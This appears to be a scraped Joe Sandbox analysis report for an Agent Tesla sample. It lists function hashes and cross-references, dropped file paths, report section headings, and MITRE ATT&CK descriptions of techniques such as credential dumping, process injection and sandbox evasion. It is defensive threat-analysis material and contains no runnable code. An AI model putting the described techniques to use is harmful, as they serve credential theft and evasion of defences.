Instruction Fuzzy Hash: E9F03630A003189FDB40EFB8E8416EDBBB1EB40300F6082A5D019AF158EA717E05CB81

Function 26639680 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7559ac7986cde3ef8a16ecad049f2bc785b4c626e425e3aa2396d1a2574ab2f6
Instruction ID: c2fdbea7310a8840ca24a1c825c31ea403e2168b6b39da676405d07ca2fc4251
Opcode Fuzzy Hash: 7559ac7986cde3ef8a16ecad049f2bc785b4c626e425e3aa2396d1a2574ab2f6
Instruction Fuzzy Hash: 2EE012B1E16109ABEB00DEB5CA4574E77ADDB43618F2089A5E80ED7202F576DB114BC0

Non-executed Functions

Function 2663AC98 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$q, xrefs: 2663AE09
$q, xrefs: 2663B24A
$q, xrefs: 2663B189
$q, xrefs: 2663B195
$q, xrefs: 2663ADD8
$q, xrefs: 2663B228
$q, xrefs: 2663B234
$q, xrefs: 2663ADFD
$q, xrefs: 2663B23E
$q, xrefs: 2663ADCC

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-1298971921
Opcode ID: 96b7c2adc3285b36d241450487dee00db4928710f77646b6be44bb53f5a9af10
Instruction ID: 0bee7911747d121dff364700971620a85464ac343ca36284b9fe42b4e0ca83b0
Opcode Fuzzy Hash: 96b7c2adc3285b36d241450487dee00db4928710f77646b6be44bb53f5a9af10
Instruction Fuzzy Hash: 25122C30E002198FDB24EB65D950B9EB7B2FF88700F209569E50AAB355DB35ED51CF80

Function 2663DF28 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$q, xrefs: 2663E0DA
$q, xrefs: 2663E0E6
$q, xrefs: 2663E01E
$q, xrefs: 2663E02A
$q, xrefs: 2663E0A4
$q, xrefs: 2663E0B0
$q, xrefs: 2663E085
$q, xrefs: 2663E079

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: e3de1773e86a3b0f4a122b4e139765f65a1ae07a95de1714568f7465c4c229c9
Instruction ID: 0966c282d1d00a874b4e167123ed5ffddea28c0855fb2611f97dfa53f531bc13
Opcode Fuzzy Hash: e3de1773e86a3b0f4a122b4e139765f65a1ae07a95de1714568f7465c4c229c9
Instruction Fuzzy Hash: E2916130E0020ADFEB14DBA5D954BAE77B3EF84701F10852AF411AB295DB34AD55CBE0

Function 2663A698 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$q, xrefs: 2663A97A
$q, xrefs: 2663ABA0
$q, xrefs: 2663ABAC
$q, xrefs: 2663AB34
$q, xrefs: 2663A9E0
$q, xrefs: 2663A9D4

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 1a920ee5f1774fcc7b3b80f012fdc66dd3884a9ea309e378489df2383816d332
Instruction ID: bf3a297ac17c8e355256e6a19e266fc033c23a042d06cdb95b743fb5b6eabc30
Opcode Fuzzy Hash: 1a920ee5f1774fcc7b3b80f012fdc66dd3884a9ea309e378489df2383816d332
Instruction Fuzzy Hash: CFF13B30E00209CFDB19DB64C494AAEB7B3FF84700F648569E416AB395DB36EC52DB90

Function 2663B9D0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$q, xrefs: 2663BC9B
$q, xrefs: 2663BC8F
$q, xrefs: 2663BC2A
$q, xrefs: 2663BC36

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 71aa69a84245a4480edbb48ed48aaf9eea686107ec0faa398f8ab481edd3f179
Instruction ID: a9d532cbe0af6757a07a814b40b797c8741a97ea8ef4741e1d22b2ce9b42b17f
Opcode Fuzzy Hash: 71aa69a84245a4480edbb48ed48aaf9eea686107ec0faa398f8ab481edd3f179
Instruction Fuzzy Hash: 8CB13930E002198FDB14EB65C490B9EBBB3FF98701F248569E4069B395DB75ED92CB81

Function 2663BDE8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$q, xrefs: 2663BE67
LRq, xrefs: 2663BF2A
LRq, xrefs: 2663BEDB
$q, xrefs: 2663BE73

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q
API String ID: 0-2204215535
Opcode ID: 239951b905564dba17fbb8c9025fe1eb8a724984d966cf63d16c94ce9cf76c03
Instruction ID: c84e0e2c8dce6263730ce3d4f5f85fe127df52ea3fb9605182b8c6576af2c385
Opcode Fuzzy Hash: 239951b905564dba17fbb8c9025fe1eb8a724984d966cf63d16c94ce9cf76c03
Instruction Fuzzy Hash: 5951B130B003068FDB18EB68C850AAAB7F2FF88744F1085A9F5169B355DA70EC11CB91

Function 2663E2B0 Relevance: 5.2, Strings: 4, Instructions: 158COMMON

Download Yara Rule

Strings

$q, xrefs: 2663E463
$q, xrefs: 2663E434
$q, xrefs: 2663E48C
$q, xrefs: 2663E3E1

Memory Dump Source

Source File: 0000000B.00000002.2484927309.0000000026630000.00000040.00000800.00020000.00000000.sdmp, Offset: 26630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26630000_msiexec.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: e8f30a7b63f2adc5b35e2ac1358667fdca983f23572f7afb5ed37590af93a8e8
Instruction ID: 2c00fa4bf8e8c4456cd2132bc6fbab599a2af5978e8ab042bb79f136c2016d7b
Opcode Fuzzy Hash: e8f30a7b63f2adc5b35e2ac1358667fdca983f23572f7afb5ed37590af93a8e8
Instruction Fuzzy Hash: 3851AE30E102158BDB15DBA4D590AAEB7B3EF88710F14952AF416EB352DB34ED12CBE1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nt8BLNLKN7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lbxwjb.you.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfdloxlr.v32.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vek4hjg4.vp2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wehgkpwr.5e0.ps1

C:\Users\user\AppData\Local\Temp\nsr982A.tmp

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Armmuskler.Fac

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155\puquinan.tod

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\latrias.reg

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\catalog.txt

Static File Info

General

File Icon

Windows Analysis Report
Nt8BLNLKN7.exe

Function 00403217 Relevance: 82.6, APIs: 28, Strings: 19, Instructions: 337
stringfilecomCOMMON

Function 0040511A Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280
windowclipboardmemoryCOMMON

Function 00405D13 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 00404FDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre